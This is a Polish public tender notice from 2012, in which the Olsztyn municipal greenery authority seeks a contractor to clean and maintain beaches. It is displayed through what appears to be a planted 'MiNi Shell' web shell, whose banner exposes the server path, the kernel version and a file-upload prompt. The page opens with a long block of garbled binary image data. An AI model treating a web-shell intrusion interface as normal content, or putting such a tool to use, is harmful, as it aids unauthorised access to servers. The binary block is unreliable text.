JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120426/134464-N-2012.html

<p class="kh_header"><b>Olsztyn: Oczyszczanie i utrzymanie plaż</b><br>
<b>Numer ogłoszenia: 134464 - 2012; data zamieszczenia: 26.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Zieleni Miejskiej w Olsztynie , Al. Wojska Polskiego 30B, 10-229 Olsztyn, woj. warmińsko-mazurskie, tel. 895266462, faks 895356471.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zzmolsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oczyszczanie i utrzymanie plaż.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	1.	Przedmiotem zamówienia jest realizacja prac związanych z oczyszczaniem i utrzymaniem plaż przy kąpieliskach niestrzeżonych zlokalizowanych w granicach administracyjnych miasta Olsztyna.
2.	Zakres prac związanych z OCZYSZCZANIEM PLAŻ, których realizacja odbywa się poprzez stały monitoring terenu przez Wykonawcę - obejmuje:
1)	powierzchniowe utrzymanie czystości w tym: zbieranie papierów, niedopałków, szkła, two?rzyw sztucznych, przedmiotów metalowych, padłych zwierząt, połamanych gałęzi i innych odpadów.
Oczyszczanie terenów powinno być realizowane z taką częstotliwością, aby teren odznaczał się wizualną czystością. Rozumie się, przez to przestrzeń pozbawioną widocznych śmieci, a także niedopałków z papierosów, które powinny być wymiatane na bieżąco. Wykonawca decyduje o częstotliwości sprzątania, powinien jednak dostosować ją do potrzeb tak, aby teren objęty postępowaniem był zadbany.
Wykonawca zobowiązany jest do realizacji prac również w dniach wolnych od pracy bez dodatkowego wynagrodzenia.
Usuwanie odpadów komunalnych winno odbywać się z zastosowaniem sprzętu zapewniającego odpowiednie warunki sanitarne podczas transportu odpadów do miejsca unieszkodliwiania.
2)	oczyszczanie brzegów plaż z zanieczyszczeń - usuwanie naniesionych przez wodę zanieczyszczeń w postaci glonów, resztek roślinności i innych odpadów.  Częstotliwość usuwania zanieczyszczeń należy dostosować do potrzeb tak, aby teren objęty postępowaniem wyglądał na zadbany.
3)	obsługa kręgów betonowych w tym: 
a)	opróżnianie kręgów z odpadów komunalnych z taką częstotliwością, aby nie dochodziło do ich przepełnienia. Nie dopuszczalne jest zaleganie śmieci w śmietniku, szczególnie podczas wysokich temperatur letnich. Koszt zakupu worków do kręgów ponosi Wykonawca.
b)	ustawienie przewróconych lub wrzuconych do wody kręgów  
c)	oczyszczanie terenu wokół kręgów w trakcie ich opróżniania w promieniu 2 m, łącznie z zamieceniem lub wygrabieniem,
d)	doraźne mycie i odkażanie w przypadku widocznych zabrudzeń. Kręgi muszą być utrzymywane w stałej czystości, poprzez mycie oraz stosowanie środków do dezynfekcji dopuszczo?nych do tego celu przez obowiązujące przepisy prawa. Kręgi nie mogą nosić śladów po resztkach śmieci, niedopuszczalne jest, aby były w widoczny sposób zabrudzone. Mycie i dezynfekowanie kręgów będzie wyko?nywane z częstotliwością dostosowaną do potrzeb i bez wezwania ze strony Zamawiającego. Koszt zakupu środków do mycia i odkażania ponosi Wykonawca.
e)	malowanie kręgów - Wykonawca ponosi koszt zakupu farby. Zamawiający przewiduje jednokrotne malowanie wszystkich kręgów.
4)	doraźne oczyszczanie terenu z zanieczyszczeń wielkogabarytowych tj.: gruz, meble, zużyty sprzęt RTV i AGD, zanieczyszczenia zebrane w workach itp. Wykonawca zobowiązany jest do stałego monitorowania terenu i usuwania zanieczyszczeń wielkogabarytowych na bieżąco. W przypadku wystąpienia zanieczyszczeń gabarytowych Usługodawca jest zobowiązany do powiadamiania o tym fakcie Inspektora ZZM i przy jego udziale określa wielkość zanieczyszczenia. Wykonawca zobowiązany jest każdorazowo do udokumentowania przekazania odpadów komunalnych i wielkogabarytowych zebranych z terenu objętego umową. Podstawą dokumentacji są karty przekazania odpadów załączone każdorazowo do faktury.
5)	ustawienie i oczyszczanie toalet na nad Jeziorem Krzywym:
a)	1 toaleta na plaży przy Zatoce Miłej,
b)	1 toaleta na plaży za ośrodkiem harcerskim,
c)	1 toaleta na plaży przy ul. Bałtyckiej, 
d)	1 toaleta na plaży przy Os. Gutkowo,
e)	1 toaleta na plaży przy ul. Żurawiej (Łupstych).
Dokładna lokalizacja toalet zostanie wskazana Wykonawcy przez przedstawiciela Zamawiającego.
Wykonawca ponosi koszt ustawienia, utrzymywania i usunięcia toalet, uwzględniając go w wynagrodzeniu ryczałtowym. 
Wykonawca zobowiązany jest do stałego utrzymania w czystości toalet. Toalety powinny być opróżniane systematycznie, nie rzadziej jednak niż trzy razy w tygodniu. Koszt zakupu środków czystości ponosi Wykonawca.  
3.	Zakres prac związanych z UTRZYMANIEM PLAŻ wykonanych każdorazowo na podstawie pisemnego zlecenia Zamawiającego (w terminie zawartym w zleceniu) obejmuje:
1)	ustawienie nowych kręgów - wymiana zniszczonych lub skradzionych kręgów. Koszt zakupu kręgów w miejsce zniszczonych lub skradzionych ponosi Zamawiający. Koszt transportu kręgów z siedziby Zamawiającego ponosi Wykonawca. Kręgi należy zamontować w miejsca wskazane przez Inspektora. 
2)	ustawienie ławek - koszt zakupu ławek ponosi Zamawiający. Koszt transportu ławek z siedziby Zamawiającego ponosi Wykonawca. Montaż ławek do podłoża winien być wykonany w sposób gwarantujący zabezpieczenie przed dewastacją (odkręcenie śrub, wyrwanie itp.) Ławki należy zamontować w miejsca wskazane przez Inspektora.
Fundament pod ławkę przewiduje umieszczenie 4 krawężników betonowych prostych o wymiarach 1,0 x 0,30 x 0,15 m wkopanych pionowo w ziemię lub wykonanie fundamentu betonowego o wymiarach 0,60*0,30*0,8m. 
Teren wokół ławki należy zrekultywować (odtworzyć trawnik). 
3)	formowanie plaż piaszczystych i trawiastych - przekopanie terenu, wyrównanie istniejącego gruntu przez ścięcie wypukłości, przemieszczenie urobku i zasypanie wgłębień, ostateczne ręczne wyrównanie plantowanej powierzchni. W przypadku praż trawiastych - dosianie trawy.
4)	dowóz i rozścielenie piasku na plaży - zakup, dowiezienie i rozplantowanie warstwy piasku grubości 20 cm. Do realizacji zamówienia należy użyć płukany piasek drobnoziarnisty tj. zawierający więcej niż 90% ziaren o średnicy do 2 mm,
5)	koszenie - koszenie trawników i łąk oraz zgrabienie i usunięcie pozostałości po wykoszeniu.
6)	naprawa elementów małej architektury - np. ławki, stoły i ogrodzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp w zakresie obejmującym nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.68.00.00-7, 77.31.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona ustalenia czy Wykonawca spełnia warunki udziału w postępowaniu o udzielenie niniejszego zamówienia, w następującym zakresie:
1.	warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
1)	W tym celu Wykonawca składa oświadczenie o spełnieniu tegoż warunku zgodnie z Załącznikiem Nr 3 do SIWZ. 
Ocena spełnienia tego warunku nastąpi na podstawie załączonego do oferty oświadczenia wymienionego w dziale VIII ust. 2 SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że chociaż jeden z nich lub łącznie spełniają ww warunek
2)	Wykonawca ponadto musi posiadać aktualną (ważną) decyzję zezwalającą na odbiór odpadów komunalnych z terenu Olsztyna, wydaną na podstawie przepisów ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2005 r. Nr 236, poz. 2008, z późn. zm.)

Ocena spełnienia tego szczegółowego warunku nastąpi na podstawie załączonej do oferty kserokopii decyzji poświadczonej za zgodność z oryginałem. 
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. 

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że chociaż jeden z nich lub łącznie spełniają ww warunek</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona ustalenia czy Wykonawca spełnia warunki udziału w postępowaniu o udzielenie niniejszego zamówienia, w zakresie warunku posiadania wiedzy i doświadczenia. W tym celu:
1)	wykonawca składa oświadczenie o spełnieniu tegoż warunku zgodnie z Załącznikiem Nr 3 do SIWZ. Ocena spełnienia tego warunku nastąpi na podstawie załączonego do oferty oświadczenia wymienionego w dziale VIII ust. 2 SIWZ.
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że chociaż jeden z nich lub łącznie spełniają ww warunek
2)	Wykonawca ponadto wykaże, że wykonał lub wykonuje (wykonana część odpowiada żądanej kwocie) w okresie ostatnich trzech lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed upływem terminu składania ofert ukończył realizację, min. 2 usługi o wartości min. 30 000,00 zł każda odpowiadającym swoim rodzajem usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Przez usługę odpowiadającą rodzajem usługom stanowiącym przedmiot zamówienia, należy rozumieć usługi, których zakres obejmował w szczególności oczyszczanie terenów zieleni.

Do niniejszego wykazu należy dołączyć dokumenty potwierdzające, że wymienione usługi zostały wykonane lub są wykonywane należycie - zgodnie z Załącznikiem nr 5 do SIWZ pn. Doświadczenie Zawodowe.

W przypadku złożenia przez Wykonawcę kilku ofert, ilość zrealizowanych umów musi być odpowiednio większa. 
Ocena spełniania warunku szczegółowego będzie dokonana na podstawie wypełnionego Załącznika nr 5 do SIWZ pn.: Doświadczenie Zawodowe. Do załącznika Nr 5 należy dołączyć dokumenty potwierdzające, że wymienione usługi zostały wykonane lub są wykonywane należycie. 
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że chociaż jeden z nich lub łącznie spełniają ww warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona ustalenia czy Wykonawca spełnia warunki udziału w postępowaniu o udzielenie niniejszego zamówienia, w zakresie warunku dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia. W tym celu wykonawca składa oświadczenie o spełnieniu warunku zgodnie z Załącznikiem Nr 3 do SIWZ. Ocena spełnienia tego warunku nastąpi na podstawie załączonego do oferty oświadczenia wymienionego w dziale VIII ust. 2 SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona ustalenia czy Wykonawca spełnia warunki udziału w postępowaniu o udzielenie niniejszego zamówienia, w zakresie warunku dysponowania  osobami zdolnymi do wykonania zamówienia. W tym celu wykonawca składa oświadczenie o spełnieniu warunku zgodnie z Załącznikiem Nr 3 do SIWZ. Ocena spełnienia tego warunku nastąpi na podstawie załączonego do oferty oświadczenia wymienionego w dziale VIII ust. 2 SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ww warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona ustalenia czy Wykonawca spełnia warunki udziału w postępowaniu o udzielenie niniejszego zamówienia, w zakresie4.	warunku dotyczącego sytuacji ekonomicznej i finansowej. W tym celu wykonawca złoży oświadczenie o spełnieniu warunku zgodnie z Załącznikiem Nr 3 do SIWZ, o którym mowa w dziale VIII ust. 2 SIWZ, że znajduje się w sytuacji finansowej ekonomicznej zapewniającej wykonanie Zamówienia. Ocena spełnienia warunku nastąpi na podstawie załączonego do oferty oświadczenia wymienionego w dziale VIII ust. 2 SIWZ. 
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają wyżej wymieniony warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wykonawca, którego oferta zostanie wybrana, zobowiązany będzie do podpisania umowy na warunkach określonych we wzorze umowy stanowiącym załącznik nr 2 do niniejszej SIWZ.
2.	Zmiany treści umowy zawartej z Wykonawcą na niniejsze zamówienie możliwe będą jedynie w trybie art. 144 ustawy pzp i mogą nastąpić tylko na piśmie w formie aneksu pod rygorem nieważności w przypadku:
1)	Przyczyna - Przekształcenie firmy, zmiana nazwy firmy. Skutek - zmiana w umowie/aneks - spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy,
2)	Przyczyna - brak możliwości terminowego wykonania umowy powstały z przyczyn niezależnych od stron umowy, Skutek - zmiana w umowie/aneks - spisanie aneksu do umowy uwzględniającego zmianę terminu realizacji zamówienia, 
3)	Przyczyna - zmiany osób odpowiedzialnych za kontakty i realizujących przedmiot umowy. Zmiana, której-kolwiek osób w trakcie realizacji przedmiotu niniejszej umowy, musi być uzasadniona przez Wy?konawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji Skutek - zmiana w umowie/aneks - spisanie aneksu do umowy uwzględniającego zmianę osób odpowiedzialnych za kontakty i realizujących przedmiot umowy;
4)	Przyczyna - zmiany terminu na skutek działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia, Skutek - spisanie aneksu do umowy uwzględniającego zmianę terminu realizacji zamówienia, 
5)	Przyczyna - Zmiany podwykonawców, pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany dotychczasowy podwykonawca, Skutek - spisanie aneksu do umowy uwzględniającego zmianę podwykonawców
3.	W przypadku urzędowej zmiany stawki VAT koszt wzrostu stawki VAT pokrywa Wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zzmolsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Zieleni Miejskiej w Olsztynie, al. Wojska Polskiego 30b, 10-229 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2012 godzina 10:00, miejsce: Zarząd Zieleni Miejskiej w Olsztynie, al. Wojska Polskiego 30b, 10-229 Olsztyn (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com